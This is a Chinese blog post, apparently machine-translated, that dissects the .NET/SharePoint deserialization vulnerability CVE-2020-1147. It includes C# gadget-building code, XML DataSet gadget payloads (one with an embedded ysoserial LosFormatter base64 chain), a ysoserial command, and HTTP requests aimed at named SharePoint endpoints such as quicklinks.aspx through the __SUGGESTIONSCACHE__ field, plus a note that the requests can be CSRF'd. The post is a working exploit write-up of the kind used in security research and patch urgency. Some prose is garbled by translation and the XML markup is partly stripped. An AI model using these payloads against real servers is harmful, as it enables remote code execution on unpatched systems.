博客详细介绍了CVE-2020-1147漏洞,这是一个影响.NET Framework,SharePoint Server和Visual Studio的远程执行代码漏洞。攻击者可以通过上传特制文档来利用此漏洞,导致服务器执行任意代码。文章讨论了漏洞的工作原理,包括反序列化过程中的类型混淆,并提供了针对SharePoint Server的利用示例,特别是如何通过Microsoft.PerformancePoint.Scorecards.Client.ExcelDataSet控件触发远程代码执行。此外,还探讨了如何构建和利用XML数据集小工具来实现代码执行。
CVE-2020-1147 | .NET Framework,SharePoint Server和Visual Studio远程执行代码漏洞
当该软件无法检查XML文件输入的源标记时,.NET Framework,Microsoft SharePoint和Visual Studio中将存在一个远程执行代码漏洞。成功利用此漏洞的攻击者可以在负责反序列化XML内容的过程的上下文中运行任意代码。要利用此漏洞,攻击者可以利用受影响的产品将特制文档上载到服务器,以处理内容。该安全更新通过更正.NET Framework,Microsoft SharePoint和Visual Studio如何验证XML内容的源标记来解决该漏洞。漏洞详情报告:https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1147当CVE-2020至1147年最后一周发布我很好奇,怎么这个漏洞表现,以及如何攻击者可能实现远程代码执行它。由于我对SharePoint Server和.net有点熟悉,因此决定看一看。
TL; DR
我分享CVE-2020-1147的细目分类,该细目由Oleksandr Mirosh,Markus Wulftange和Jonathan Birch独立发现。我将分享有关如何针对SharePoint Server实例利用它来以低特权用户身份执行远程代码的详细信息。请注意:我没有提供完整的漏洞利用功能,因此,如果您遇到麻烦,请继续前进。
对我而言突出的一件事是,Microsoft 引用了与该错误相关的安全指南,并引用了Microsoft:
如果传入的XML数据包含其类型不在此列表中的对象,则会引发异常。反序列化操作失败。在将XML加载到现有的DataSet或DataTable实例中时,还将考虑现有的列定义。如果该表已包含自定义类型的列定义,则在XML反序列化操作期间,该类型将被临时添加到允许列表中。
有趣的是,可以指定类型,并且可以覆盖列定义。那是我的主要礼物,让我们看一下如何DataSet创建对象:
了解数据集对象
A DataSet包含Datatable带有DataColumn(s)和DataRow(s)的。更重要的是,它实现了ISerializable意味着可以使用序列化的接口XmlSerializer。让我们从创建一个开始DataTable:
static void Main(string[] args)
{
// instantiate the table
DataTable exptable = new DataTable("exp table");
// make a column and set type information and append to the table
DataColumn dc = new DataColumn("ObjectDataProviderCol");
dc.DataType = typeof(ObjectDataProvider);
exptable.Columns.Add(dc);
// make a row and set an object instance and append to the table
DataRow row = exptable.NewRow();
row["ObjectDataProviderCol"] = new ObjectDataProvider();
exptable.Rows.Add(row);
// dump the xml schema
exptable.WriteXmlSchema("c:/poc-schema.xml");
}
使用该WriteXmlSchema方法,可以写出模式定义。该代码产生以下内容:
<?xml version="1.0" standalone="yes"?>
id="NewDataSet" xmlns="" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:msdata="urn:schemas-microsoft-com:xml-msdata">name="NewDataSet" msdata:IsDataSet="true" msdata:MainDataTable="exp_x0020_table" msdata:UseCurrentLocale="true">minOccurs="0" maxOccurs="unbounded">name="exp_x0020_table">name="ObjectDataProviderCol" msdata:DataType="System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35" type="xs:anyType" minOccurs="0" />
查看DataSet它的代码后发现,它XmlSerializer使用WriteXml和公开了自己的序列化方法(包装在上)ReadXML:
System.Data.DataSet.ReadXml(XmlReader reader, Boolean denyResolving)
System.Data.DataSet.ReadXmlDiffgram(XmlReader reader)
System.Data.XmlDataLoader.LoadData(XmlReader reader)
System.Data.XmlDataLoader.LoadTable(DataTable table, Boolean isNested)
System.Data.XmlDataLoader.LoadColumn(DataColumn column, Object[] foundColumns)
System.Data.DataColumn.ConvertXmlToObject(XmlReader xmlReader, XmlRootAttribute xmlAttrib)
System.Data.Common.ObjectStorage.ConvertXmlToObject(XmlReader xmlReader, XmlRootAttribute xmlAttrib)
System.Xml.Serialization.XmlSerializer.Deserialize(XmlReader xmlReader)
现在,剩下要做的就是将表添加到数据集中并对其进行序列化:
DataSet ds = new DataSet("poc");
ds.Tables.Add(exptable);
using (var writer = new StringWriter())
{
ds.WriteXml(writer);
Console.WriteLine(writer.ToString());
}
这些序列化方法保留模式类型,并在运行时使用DataSet实例化XmlSerializer对象图中的单个预期类型来重建攻击者影响的类型。
数据集小工具
以下是可以制作的此类小工具的示例,请注意,请勿将此与ysoserial中的DataSet小工具混淆:
xmlns="" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:msdata="urn:schemas-microsoft-com:xml-msdata" id="somedataset">name="somedataset" msdata:IsDataSet="true" msdata:UseCurrentLocale="true">minOccurs="0" maxOccurs="unbounded">name="Exp_x0020_Table">name="pwn" msdata:DataType="System.Data.Services.Internal.ExpandedWrapper`2[[System.Windows.Markup.XamlReader, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35],[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" type="xs:anyType" minOccurs="0"/>
xmlns:msdata="urn:schemas-microsoft-com:xml-msdata" xmlns:diffgr="urn:schemas-microsoft-com:xml-diffgram-v1">diffgr:id="Exp Table1" msdata:rowOrder="0" diffgr:hasChanges="inserted">xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">Parsexmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xsi:type="xsd:string">cmd/c mspaint ]]>xsi:type="XamlReader"/>
此小工具链将在上调用任意静态方法,Type该方法不包含任何接口成员。在这里,我使用臭名昭著的方法XamlReader.Parse来加载恶意Xaml以执行系统命令。ExpandedWrapper正如@pwntester的惊人研究提到的那样,我使用该类加载了两种不同的类型。
可以在许多接收器中利用它,例如:
XmlSerializer ser = new XmlSerializer(typeof(DataSet));
Stream reader = new FileStream("c:/poc.xml", FileMode.Open);
ser.Deserialize(reader);
许多应用程序都认为DataSet是安全的,因此即使无法将期望的类型直接控制为XmlSerializer,DataSet也通常在对象图中使用。但是,最有趣的接收器是DataSet.ReadXml触发代码执行:
DataSet ds = new DataSet();
ds.ReadXml("c:/poc.xml");
将小工具应用于SharePoint Server
如果我们看一下ZDI-20-874,则该通报提到了Microsoft.PerformancePoint.Scorecards.Client.ExcelDataSet可以用于远程代码执行的控件。这立即引起了我的兴趣,因为它的类名中带有名称(DataSet)。让我们看一下SharePoint的默认web.config文件:
tagPrefix="asp" namespace="System.Web.UI" assembly="System.Web.Extensions, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35" />tagPrefix="SharePoint" namespace="Microsoft.SharePoint.WebControls" assembly="Microsoft.SharePoint, Version=16.0.0.0, Culture=neutral, PublicKeyToken=71e9bce111e9429c" />tagPrefix="WebPartPages" namespace="Microsoft.SharePoint.WebPartPages" assembly="Microsoft.SharePoint, Version=16.0.0.0, Culture=neutral, PublicKeyToken=71e9bce111e9429c" />tagPrefix="PWA" namespace="Microsoft.Office.Project.PWA.CommonControls" assembly="Microsoft.Office.Project.Server.PWA, Version=16.0.0.0, Culture=neutral, PublicKeyToken=71e9bce111e9429c" />tagPrefix="spsswc" namespace="Microsoft.Office.Server.Search.WebControls" assembly="Microsoft.Office.Server.Search, Version=16.0.0.0, Culture=neutral, PublicKeyToken=71e9bce111e9429c" />在controls标记下,我们可以看到Microsoft.PerformancePoint.Scorecards名称空间不存在前缀。但是,如果我们检查SafeControl标记,则确实列出了允许的命名空间中的所有类型。
Assembly="Microsoft.PerformancePoint.Scorecards.Client, Version=16.0.0.0, Culture=neutral, PublicKeyToken=71e9bce111e9429c" Namespace="Microsoft.PerformancePoint.Scorecards" TypeName="*" />
...现在我们知道我们可以从该命名空间实例化类,让我们深入研究代码以检查ExcelDataSet类型:
namespace Microsoft.PerformancePoint.Scorecards
{
[Serializable]
public class ExcelDataSet
{
我注意到的第一件事是它是可序列化的,因此我知道它实际上可以实例化为控件,并且默认构造函数将与未使用该System.Xml.Serialization.XmlIgnoreAttribute属性标记的所有公共设置方法一起被调用。SharePoint XmlSerializer用于从控件创建对象,因此攻击者提供的数据可能流入代码的任何位置,从而可以利用TemplateControl.ParseControl这种ExcelDataSet类型。
突出的属性之一是该属性,DataTable因为它包含一个公共的setter并使用type System.Data.DataTable。但是,通过仔细检查,我们可以看到该XmlIgnore属性正在使用中,因此无法使用此setter触发反序列化。
[XmlIgnore]
public DataTable DataTable
{
get
{
if (this.dataTable == null && this.compressedDataTable != null)
{
this.dataTable = (Helper.GetObjectFromCompressedBase64String(this.compressedDataTable, ExcelDataSet.ExpectedSerializationTypes) as DataTable);
if (this.dataTable == null)
{
this.compressedDataTable = null;
}
}
return this.dataTable;
}
set
{
this.dataTable = value;
this.compressedDataTable = null;
}
}
上面的代码确实显示了部分答案,但是getter GetObjectFromCompressedBase64String使用该compressedDataTable属性进行调用。此方法将解码提供的base64,解压缩二进制格式器有效负载并对其进行调用BinaryFormatter.Deserialize。但是,代码包含反序列化的预期类型,其中之一是DataTable,因此我们不能只在此处填充生成的 TypeConfuseDelegate。
private static readonly Type[] ExpectedSerializationTypes = new Type[]
{
typeof(DataTable),
typeof(Version)
};
检查该CompressedDataTable属性,我们可以看到设置compressedDataTable成员没有问题,因为该成员正在使用System.Xml.Serialization.XmlElementAttribute属性。
[XmlElement]
public string CompressedDataTable
{
get
{
if (this.compressedDataTable == null && this.dataTable != null)
{
this.compressedDataTable = Helper.GetCompressedBase64StringFromObject(this.dataTable);
}
return this.compressedDataTable;
}
set
{
this.compressedDataTable = value;
this.dataTable = null;
}
}
将其(几乎全部)放在一起,我可以注册一个前缀,并使用base64编码,压缩和序列化(尽管很危险)实例化控件DataTable:
PUT /poc.aspx HTTP/1.1
Host:
Authorization:
Content-Length: 1688但是,我无法找到触发DataTable属性获取器的方法。我知道我需要一种使用DataSet的方法,但我只是不知道如何使用。
许多途径通向罗马
尘封!和我的狗散步后,我决定以不同的方式思考这个问题,并问自己有哪些其他水槽可用。然后我想起了接收DataSet.ReadXml器也是麻烦的根源,所以我再次检查了代码,发现了这个有效的代码路径:
Microsoft.SharePoint.Portal.WebControls.ContactLinksSuggestionsMicroView.GetDataSet()
Microsoft.SharePoint.Portal.WebControls.ContactLinksSuggestionsMicroView.PopulateDataSetFromCache(DataSet)
在ContactLinksSuggestionsMicroView类内部,我们可以看到该GetDataSet方法:
protected override DataSet GetDataSet()
{
base.StopProcessingRequestIfNotNeeded();
if (!this.Page.IsPostBack || this.Hidden) // 1
{
return null;
}
DataSet dataSet = new DataSet();
DataTable dataTable = dataSet.Tables.Add();
dataTable.Columns.Add("PreferredName", typeof(string));
dataTable.Columns.Add("Weight", typeof(double));
dataTable.Columns.Add("UserID", typeof(string));
dataTable.Columns.Add("Email", typeof(string));
dataTable.Columns.Add("PageURL", typeof(string));
dataTable.Columns.Add("PictureURL", typeof(string));
dataTable.Columns.Add("Title", typeof(string));
dataTable.Columns.Add("Department", typeof(string));
dataTable.Columns.Add("SourceMask", typeof(int));
if (this.IsInitialPostBack) // 2
{
this.PopulateDataSetFromSuggestions(dataSet);
}
else
{
this.PopulateDataSetFromCache(dataSet); // 3
}
this.m_strJavascript.AppendLine("var user = new Object();");
foreach (object obj in dataSet.Tables[0].Rows)
{
DataRow dataRow = (DataRow)obj;
string scriptLiteralToEncode = (string)dataRow["UserID"];
int num = (int)dataRow["SourceMask"];
this.m_strJavascript.Append("user['");
this.m_strJavascript.Append(SPHttpUtility.EcmaScriptStringLiteralEncode(scriptLiteralToEncode));
this.m_strJavascript.Append("'] = ");
this.m_strJavascript.Append(num.ToString(CultureInfo.CurrentCulture));
this.m_strJavascript.AppendLine(";");
}
StringWriter stringWriter = new StringWriter(CultureInfo.CurrentCulture);
dataSet.WriteXml(stringWriter);
SPPageContentManager.RegisterHiddenField(this.Page, "__SUGGESTIONSCACHE__", stringWriter.ToString());
return dataSet;
}
在[1]处,代码检查该请求是否为POST后退请求。为确保这一点,攻击者可以设置__viewstatePOST变量,然后在[2]处,代码将检查__SUGGESTIONSCACHE__POST变量是否已设置,如果已设置,则IsInitialPostBackgetter将返回false。只要此getter返回false,攻击者就可以到达[3]并到达PopulateDataSetFromCache。该调用将使用DataSet通过特定架构定义创建的。
protected void PopulateDataSetFromCache(DataSet ds)
{
string value = SPRequestParameterUtility.GetValue<string>(this.Page.Request, "__SUGGESTIONSCACHE__", SPRequestParameterSource.Form);
using (XmlTextReader xmlTextReader = new XmlTextReader(new StringReader(value)))
{
xmlTextReader.DtdProcessing = DtdProcessing.Prohibit;
ds.ReadXml(xmlTextReader); // 4
ds.AcceptChanges();
}
}
在内部PopulateDataSetFromCache,代码调用SPRequestParameterUtility.GetValue从__SUGGESTIONSCACHE__请求变量获取攻击者控制的数据,并将其直接解析为ReadXmlusing XmlTextReader。先前定义的模式被攻击者提供的XML所提供的模式覆盖,并且在[4]处发生不可信类型的反序列化,从而导致远程执行代码。为了触发此操作,我创建了一个ContactLinksSuggestionsMicroView专门使用该类型的页面:
PUT /poc.aspx HTTP/1.1
Host:
Authorization:
Content-Length: 252如果您以特权低的用户身份使用此bug且该AddAndCustomizePages设置已被禁用,则可以使用实例化该InputFormContactLinksSuggestionsMicroView控件的页面来利用此bug ,因为它从扩展ContactLinksSuggestionsMicroView。
namespace Microsoft.SharePoint.Portal.WebControls
{
[SharePointPermission(SecurityAction.Demand, ObjectModel = true)]
[AspNetHostingPermission(SecurityAction.LinkDemand, Level = AspNetHostingPermissionLevel.Minimal)]
[AspNetHostingPermission(SecurityAction.InheritanceDemand, Level = AspNetHostingPermissionLevel.Minimal)]
[SharePointPermission(SecurityAction.InheritanceDemand, ObjectModel = true)]
public class InputFormContactLinksSuggestionsMicroView : ContactLinksSuggestionsMicroView
{
我发现了一些实现该控件的端点 (但我还没来得及测试它们)更新:Soroush Dalili为我测试了它们,并确认它们确实是可利用的。
/_layouts/15/quicklinks.aspx?Mode=建议
/_layouts/15/quicklinksdialogform.aspx?Mode=建议
现在,要利用它,我们可以对我们的新页面执行发布请求:
POST /poc.aspx HTTP/1.1
Host:
Authorization:
Content-Type: application/x-www-form-urlencoded
Content-Length:
__viewstate=&__SUGGESTIONSCACHE__=要么
POST /quicklinks.aspx?Mode=Suggestion HTTP/1.1
Host:
Authorization:
Content-Type: application/x-www-form-urlencoded
Content-Length:
__viewstate=&__SUGGESTIONSCACHE__=要么
POST /quicklinksdialogform.aspx?Mode=Suggestion HTTP/1.1
Host:
Authorization:
Content-Type: application/x-www-form-urlencoded
Content-Length:
__viewstate=&__SUGGESTIONSCACHE__=请注意,也可以对每个这些端点进行csrfed,因此不一定需要凭据。
最后一件事
您不能使用XamlReader.Load静态方法,因为IIS Web服务器将模拟为IUSR帐户,并且该帐户对注册表具有有限的访问权限。如果尝试这样做,除非没有在IIS下禁用模拟并使用应用程序池标识,否则最终将得到这样的堆栈跟踪:
{System.InvalidOperationException: There is an error in the XML document. ---> System.TypeInitializationException: The type initializer for 'MS.Utility.EventTrace' threw an exception. ---> System.Security.SecurityException: Requested registry access is not allowed.
at System.ThrowHelper.ThrowSecurityException(ExceptionResource resource)
at Microsoft.Win32.RegistryKey.OpenSubKey(String name, Boolean writable)
at Microsoft.Win32.RegistryKey.OpenSubKey(String name)
at Microsoft.Win32.Registry.GetValue(String keyName, String valueName, Object defaultValue)
at MS.Utility.EventTrace.IsClassicETWRegistryEnabled()
at MS.Utility.EventTrace..cctor()
--- End of inner exception stack trace ---
at MS.Utility.EventTrace.EasyTraceEvent(Keyword keywords, Event eventID, Object param1)
at System.Windows.Markup.XamlReader.Load(XmlReader reader, ParserContext parserContext, XamlParseMode parseMode, Boolean useRestrictiveXamlReader, List`1 safeTypes)
at System.Windows.Markup.XamlReader.Load(XmlReader reader, ParserContext parserContext, XamlParseMode parseMode, Boolean useRestrictiveXamlReader)
at System.Windows.Markup.XamlReader.Load(XmlReader reader, ParserContext parserContext, XamlParseMode parseMode)
at System.Windows.Markup.XamlReader.Load(XmlReader reader)
at System.Windows.Markup.XamlReader.Parse(String xamlText)
--- End of inner exception stack trace ---
at System.Xml.Serialization.XmlSerializer.Deserialize(XmlReader xmlReader, String encodingStyle, XmlDeserializationEvents events)
at System.Xml.Serialization.XmlSerializer.Deserialize(XmlReader xmlReader, String encodingStyle)
at System.Xml.Serialization.XmlSerializer.Deserialize(XmlReader xmlReader)
at System.Data.Common.ObjectStorage.ConvertXmlToObject(XmlReader xmlReader, XmlRootAttribute xmlAttrib)
at System.Data.DataColumn.ConvertXmlToObject(XmlReader xmlReader, XmlRootAttribute xmlAttrib)
at System.Data.XmlDataLoader.LoadColumn(DataColumn column, Object[] foundColumns)
at System.Data.XmlDataLoader.LoadTable(DataTable table, Boolean isNested)
at System.Data.XmlDataLoader.LoadData(XmlReader reader)
at System.Data.DataSet.ReadXmlDiffgram(XmlReader reader)
at System.Data.DataSet.ReadXml(XmlReader reader, Boolean denyResolving)
at System.Data.DataSet.ReadXml(XmlReader reader)
at Microsoft.SharePoint.Portal.WebControls.ContactLinksSuggestionsMicroView.PopulateDataSetFromCache(DataSet ds)
at Microsoft.SharePoint.Portal.WebControls.ContactLinksSuggestionsMicroView.GetDataSet()
at Microsoft.SharePoint.Portal.WebControls.PrivacyItemView.GetQueryResults(Object obj)
您需要找到另一种危险的静态方法或设置器,以从不使用接口成员的类型进行调用, 我把这作为练习留给读者,祝您好运!
远程执行代码漏洞
好吧,我撒谎了。事实是,我只希望人们阅读完整的博客文章,而不是着急寻找漏洞的有效负载,因此更好地了解您所知道的基础技术吗?无论如何,要利用此错误,我们可以(ab)使用该LosFormatter.Deserialize方法,因为该类不包含接口成员。为此,我们需要生成序列化ObjectStateFormatter小工具链的base64有效负载:
c:\> ysoserial.exe -g TypeConfuseDelegate -f LosFormatter -c mspaint
现在,我们可以将有效负载插入以下DataSet小工具,并针对目标SharePoint Server 触发远程代码执行!
xmlns="" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:msdata="urn:schemas-microsoft-com:xml-msdata" id="somedataset">name="somedataset" msdata:IsDataSet="true" msdata:UseCurrentLocale="true">minOccurs="0" maxOccurs="unbounded">name="Exp_x0020_Table">name="pwn" msdata:DataType="System.Data.Services.Internal.ExpandedWrapper`2[[System.Web.UI.LosFormatter, System.Web, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a],[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" type="xs:anyType" minOccurs="0"/>
xmlns:msdata="urn:schemas-microsoft-com:xml-msdata" xmlns:diffgr="urn:schemas-microsoft-com:xml-diffgram-v1">diffgr:id="Exp Table1" msdata:rowOrder="0" diffgr:hasChanges="inserted">xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">Deserializexmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xsi:type="xsd:string">/wEykwcAAQAAAP8BAAAAAAAAAAwCAAAAXk1pY3Jvc29mdC5Qb3dlclNoZWxsLkVkaXRvciwgVmVyc2lvbj0zLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPTMxYmYzODU2YWQzNjRlMzUFAQAAAEJNaWNyb3NvZnQuVmlzdWFsU3R1ZGlvLlRleHQuRm9ybWF0dGluZy5UZXh0Rm9ybWF0dGluZ1J1blByb3BlcnRpZXMBAAAAD0ZvcmVncm91bmRCcnVzaAECAAAABgMAAAC1BTw/eG1sIHZlcnNpb249IjEuMCIgZW5jb2Rpbmc9InV0Zi04Ij8+DQo8T2JqZWN0RGF0YVByb3ZpZGVyIE1ldGhvZE5hbWU9IlN0YXJ0IiBJc0luaXRpYWxMb2FkRW5hYmxlZD0iRmFsc2UiIHhtbG5zPSJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL3dpbmZ4LzIwMDYveGFtbC9wcmVzZW50YXRpb24iIHhtbG5zOnNkPSJjbHItbmFtZXNwYWNlOlN5c3RlbS5EaWFnbm9zdGljczthc3NlbWJseT1TeXN0ZW0iIHhtbG5zOng9Imh0dHA6Ly9zY2hlbWFzLm1pY3Jvc29mdC5jb20vd2luZngvMjAwNi94YW1sIj4NCiAgPE9iamVjdERhdGFQcm92aWRlci5PYmplY3RJbnN0YW5jZT4NCiAgICA8c2Q6UHJvY2Vzcz4NCiAgICAgIDxzZDpQcm9jZXNzLlN0YXJ0SW5mbz4NCiAgICAgICAgPHNkOlByb2Nlc3NTdGFydEluZm8gQXJndW1lbnRzPSIvYyBtc3BhaW50IiBTdGFuZGFyZEVycm9yRW5jb2Rpbmc9Int4Ok51bGx9IiBTdGFuZGFyZE91dHB1dEVuY29kaW5nPSJ7eDpOdWxsfSIgVXNlck5hbWU9IiIgUGFzc3dvcmQ9Int4Ok51bGx9IiBEb21haW49IiIgTG9hZFVzZXJQcm9maWxlPSJGYWxzZSIgRmlsZU5hbWU9ImNtZCIgLz4NCiAgICAgIDwvc2Q6UHJvY2Vzcy5TdGFydEluZm8+DQogICAgPC9zZDpQcm9jZXNzPg0KICA8L09iamVjdERhdGFQcm92aWRlci5PYmplY3RJbnN0YW5jZT4NCjwvT2JqZWN0RGF0YVByb3ZpZGVyPgs=xsi:type="LosFormatter">
针对IIS进程获得代码执行
结论
Microsoft将该漏洞的可利用性指数等级为1,我们对此表示同意,这意味着如果没有,您应该立即对其进行修补。值得一提的是,此小工具链可用于使用.net构建的多个应用程序,因此即使您未安装SharePoint Server,也仍然会受到此bug的影响。
参考文献
https://speakerdeck.com/pwntester/attacking-net-serialization
https://docs.microsoft.com/zh-cn/dotnet/framework/data/adonet/dataset-datatable-dataview/security-guidance
https://www.zerodayinitiative.com/advisories/ZDI-20-874/
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
